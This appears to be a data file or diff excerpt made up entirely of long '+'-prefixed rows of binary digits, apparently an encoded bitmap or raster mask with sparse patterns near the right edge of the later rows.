+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111000000000000000000000000000000000000000000000000000000001101110000000000000000000000000000000000000000000000000000000000000000000000001111111100000000000000000000000000000000000000000000000000000000000000000000000011101100000000000000000000000000000000000000000000000000000000111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001110110000011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000110000000000000000000000000000000000000000000000000000000001111111000000000000000000000000000000000000000000000000000000000000000000000000110011000000000000000000000000000000000000000000000000000000000000000000000000111111100000000000000000000000000000000000000000000000000000000011000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100010000011010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100111101010001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000100011000100100110001100000000000000000000000000000000000001000010101110111000000000000000000000000000000000000100000001111000010000011000100100000000000000000000000000000000000001001011000000000110000000000000000000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000111001011010000111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000100000100100000000000000000000000000000000000000000010001001001100000000000000000000000000000000010000000000001000000000001100000100000000000000000000000000000000000010000000010000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111100011111110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000110000000000000000000000000000000000000000000000100000000000100000000000000000000000000000000000000000000010001010000000000000000100000000000000000000000000000000000000100000000000010000000000000000000000000000000000000000000010001000000000000000000000000000000000000000000000000000000000000000000001000010111100100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000001000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101001110110100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010010000000001000000000000000000001000000000000000000001010010010000110001000000000000001001001110001100000000000001010011110000110001000000000101101001001100101000000000000001000111111000110001000100100001001001001110111000000000000001010010010000110000000000000110001111001110010000000000000000000000000000000000000000000000000000000000000000000000000000001111000000001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000010000100100000000000000000000000110100000000000000000000000000100000000000000000010000001000100010000000000000000000000010100001000000000000000000000000010100000000000001000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000001101010110100101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000010000000100000000000000000000001000000000000000000000000010010000000100000000000000000000000000000100000000000000000000010000000100000000000000000000000100010000000000000000000000010000000000000000000000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000001010110011011100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000010000000000000000001000000000000000000000000000010000100000000000000000000000001000000000000000000000000000010000000000000000000001000000000100001000000000000000010000000000100000000000000001000000000000001000000000000000000000010000000000000000000000100000100001010000000000000000000000000000000000000000000000000000000000000000000000000001101100001001001111111111111111111111111111111111111111111111111 